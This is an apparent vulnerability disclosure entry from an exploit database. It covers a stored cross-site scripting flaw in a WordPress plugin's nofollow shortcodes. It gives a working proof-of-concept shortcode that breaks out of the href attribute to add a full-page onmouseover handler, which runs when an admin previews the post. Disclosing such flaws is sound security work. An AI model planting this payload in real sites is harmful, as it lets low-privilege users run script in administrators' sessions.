## https://sploitus.com/exploit?id=WPEX-ID:CCB27D2E-2D2A-40D3-BA7E-BCD5E5012A9A
Affected shortcodes: nf, nofo, nofol, nofollow, relnofollow
As a contributor, put the below shortcode in a post/page
[nf href='https://test" style="position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px" onmouseover="alert(/XSS/)']test[/nf]
The XSS will be triggered when the post is previewed (for example by an admin when reviewed)/viewed